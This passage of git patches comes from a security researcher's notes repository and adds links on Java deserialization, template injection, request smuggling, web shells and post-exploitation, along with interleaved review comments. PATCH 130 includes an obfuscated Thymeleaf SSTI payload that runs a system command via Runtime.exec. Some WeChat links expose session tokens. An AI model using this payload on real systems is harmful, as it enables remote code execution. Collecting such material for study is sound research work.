[一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** From bcf52de768f34a5ec4346883ab62bf23d041ffb3 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 22:14:44 +0800 Subject: [PATCH 116/257] Create CVE-2022-42252.md --- tomcat/Smuggling/CVE-2022-42252.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 tomcat/Smuggling/CVE-2022-42252.md diff --git a/tomcat/Smuggling/CVE-2022-42252.md b/tomcat/Smuggling/CVE-2022-42252.md new file mode 100644 index 0000000..5430463 --- /dev/null +++ b/tomcat/Smuggling/CVE-2022-42252.md @@ -0,0 +1,3 @@ +https://www.xujun.org/note-154484.html + +![image](https://user-images.githubusercontent.com/63966847/201358116-b7c2e4de-0c57-461d-86b5-d370b62a5b6d.png) From a392d241bbc1fefb6197ebdced6b47fe756aa16b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 13 Nov 2022 02:01:59 +0800 Subject: [PATCH 117/257] Update Readme.md --- .../Velocity/Readme.md" | 5 +++++ 1 file changed, 5 insertions(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index f6c05c2..9c7d898 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -4,3 +4,8 @@ Confluence CVE-2019-3396 Jira CVE-2019-11581 +框架中的利用: + +https://xz.aliyun.com/t/11832 + +配合了fastjson 反序列化生成对象之后调用方法 From 6128099756ad6c518f98e7908731b72dcd2b4a70 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 19 Nov 2022 18:16:19 +0800 Subject: [PATCH 118/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3622e3f..225f958 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -199,3 +199,4 @@ + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** ++ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) From fa2f01f0e301bd8a36604eed063be0a3c9424286 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 19 Nov 2022 18:21:19 +0800 Subject: [PATCH 119/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 225f958..8360da3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -200,3 +200,4 @@ + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) ++ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** From 7d54485b4ab8d17084b1ab28378258eebf095e4c Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 20 Nov 2022 20:01:38 +0800 Subject: [PATCH 120/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8360da3..2e074c2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -201,3 +201,4 @@ + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** ++ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) 
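Review bot: In PATCH 104/257, on the added 2022/11/06 line, the link target has the article title pasted onto the end of the URL: `https://mp.weixin.qq.com/s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞`. Cut the target back to the part before `【` so it has the same `/s/<id>` shape as the other WeChat links in the list, and check that it resolves before merging.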
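Review bot: The Navicat entry added in PATCH 115/257 commits a WeChat URL that still carries `uin=`, `key=`, `pass_ticket=`, `exportkey=` and `devicetype=Windows+10+x64`, which look like values tied to the sharer's own client session rather than to the article. Other entries in this file use the short `https://mp.weixin.qq.com/s/<id>` form; replace the target with that form, or keep only `__biz`, `mid`, `idx` and `sn`. Because the values are now in the commit history, treat them as disclosed. The same trimming would remove the repeated `sharer_shareid=` value from the earlier WeChat links.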
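Review bot: The new file tomcat/Smuggling/CVE-2022-42252.md in PATCH 116/257 contains only a bare URL and an image with the placeholder alt text `image`, so the note says nothing about the issue if either external resource goes away. Add a title line as CVE-2021-33037.md has (PATCH 111/257), one sentence on what the screenshot shows, and descriptive alt text.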
From 844dfd1d2ba34b857d20de7513f9b9d8af12fa46 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 22 Nov 2022 18:44:36 +0800 Subject: [PATCH 121/257] Update Readme.md --- "java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" index 722fd77..cfc36e4 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" @@ -11,6 +11,7 @@ + [Velocity模板注入](Velocity) **2021 四川省比赛省赛非攻Java logiclogic** 后缀名.vm [wp](https://mp.weixin.qq.com/s?__biz=MzI3NDEzNzIxMg==&mid=2650481832&idx=2&sn=7b092fc6e26c7d5f131b8ef7a30dc85c&chksm=f3172dbbc460a4ad99f29b445dd92873304d7c34798f977695ba775a5096a6b707106190a09f&mpshare=1&scene=23&srcid=0924Bci6wWhHifB6Y7Cmc5hl&sharer_sharetime=1632452737857&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + [beetl模板注入](Beetl) + [jfinalcms enjoy](jfinalcms_enjoy) **2021 字节ctf考察过。** ++ [Java FreeMarker 模板引擎注入深入分析](https://mp.weixin.qq.com/s/aYTp0suulfjQ5dcocS33Kg) ------------------------------------------------------------------------------------------------------------------------- # SSTI From a43731568a56fd2be95238ce312b70268ed3d834 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Nov 2022 19:48:20 +0800 Subject: [PATCH 122/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2e074c2..a2d7665 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -202,3 +202,4 @@ + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) ++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) From 07b6b7f7a5ab3d17fed2c347c4f2ffd8ab032c3b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Nov 2022 20:07:47 +0800 Subject: [PATCH 123/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a2d7665..4e36434 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -202,4 +202,4 @@ + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) -+ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) ++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** From b3ea51bfbe450ab23aaa7623a7d2174f83fd880a Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 26 Nov 2022 21:59:40 +0800 Subject: [PATCH 124/257] =?UTF-8?q?Rename=20c=E8=AF=AD=E8=A8=80=E8=83=BD?= =?UTF-8?q?=E5=AE=9E=E7=8E=B0agent=3F!.md=20to=20c=E8=AF=AD=E8=A8=80?= =?UTF-8?q?=E8=83=BD=E5=AE=9E=E7=8E=B0agent=E5=90=97.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" => "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" (100%) diff --git "a/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" "b/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" similarity index 100% rename from "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" rename to "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" From f939b114f79692c1c31c007ddb4aa4ba8b47495c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 27 Nov 2022 11:38:32 +0800 Subject: [PATCH 125/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4e36434..e7ea0b0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -203,3 +203,4 @@ + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** ++ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 2f4f6e6db79f31b3fadb0366806c4030a5250e29 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 30 Nov 2022 11:24:32 +0800 Subject: [PATCH 126/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e7ea0b0..0ac1427 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -204,3 +204,4 @@ + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** 
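Review bot: PATCH 124/257 is a pure rename (similarity index 100%, 0 insertions, 0 deletions) from `c语言能实现agent?!.md` to `c语言能实现agent吗.md` and touches nothing else, so any link to the old name elsewhere in the repository now points at a missing file. Search the Readme files for the old name and update them in the same commit. The message should also say why `?!` was dropped: a `?` in a file name has to be percent-encoded in links and is not allowed on Windows file systems.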
From 817c0d4703ab013050aad47b0c88ebc302183eae Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 30 Nov 2022 20:08:26 +0800 Subject: [PATCH 127/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0ac1427..331bb23 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -205,3 +205,4 @@ + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** ++ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** From 7ce6d3e9d7f78cf86bda961d7f7f903f857536ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 2 Dec 2022 16:25:37 +0800 Subject: [PATCH 128/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 331bb23..dc792f6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -206,3 +206,4 @@ + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** ++ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** From 338a056bcaeba8ae2c391831d012ff2b9fdfd84c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Dec 2022 00:30:14 +0800 Subject: [PATCH 129/257] Update README.md --- Struts2/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Struts2/README.md b/Struts2/README.md index bbe2332..5f8b882 100644 --- a/Struts2/README.md +++ b/Struts2/README.md @@ -19,3 +19,8 @@ [漏洞版本](http://archive.apache.org/dist/struts/binaries/) ![](./img/环境.png) + +## TODO +分析各个s2 漏洞 +s2-62 和新的 [https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) + From 8de7d2f2d33c9801e8fb01e3d326b78526e214e3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 00:16:13 +0800 Subject: [PATCH 130/257] Create Readme.md --- .../Thymeleaf/Readme.md" | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 "java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" new file mode 100644 index 0000000..1f606b5 
--- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" @@ -0,0 +1,8 @@ +# 绕过文章 + + ++ [记一次实战之若依SSTI注入绕过玄某盾](https://mp.weixin.qq.com/s/7TCZDkfCXlmEhcTb85fw_Q) + +```java +__${T%20(%0aRuntime%09).%0dgetRuntime%0a(%09)%0d.%00exec('calc')}__::.x +``` From 94ac544cfcfe4ff50f04d4e3bdcf9ca03002fde4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 18:45:41 +0800 Subject: [PATCH 131/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dc792f6..2cab2d8 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -207,3 +207,4 @@ + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** ++ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** From bfd1c0166adf388ec31c6f465aacc5452e1aa36b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 18:58:16 +0800 Subject: [PATCH 132/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2cab2d8..7ad6d0f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -208,3 +208,4 @@ + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** ++ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** From 9d5838edce77f1baeadcc64c5367dc501fbcf4e5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 8 Dec 2022 20:06:46 +0800 Subject: [PATCH 133/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7ad6d0f..b72f4c4 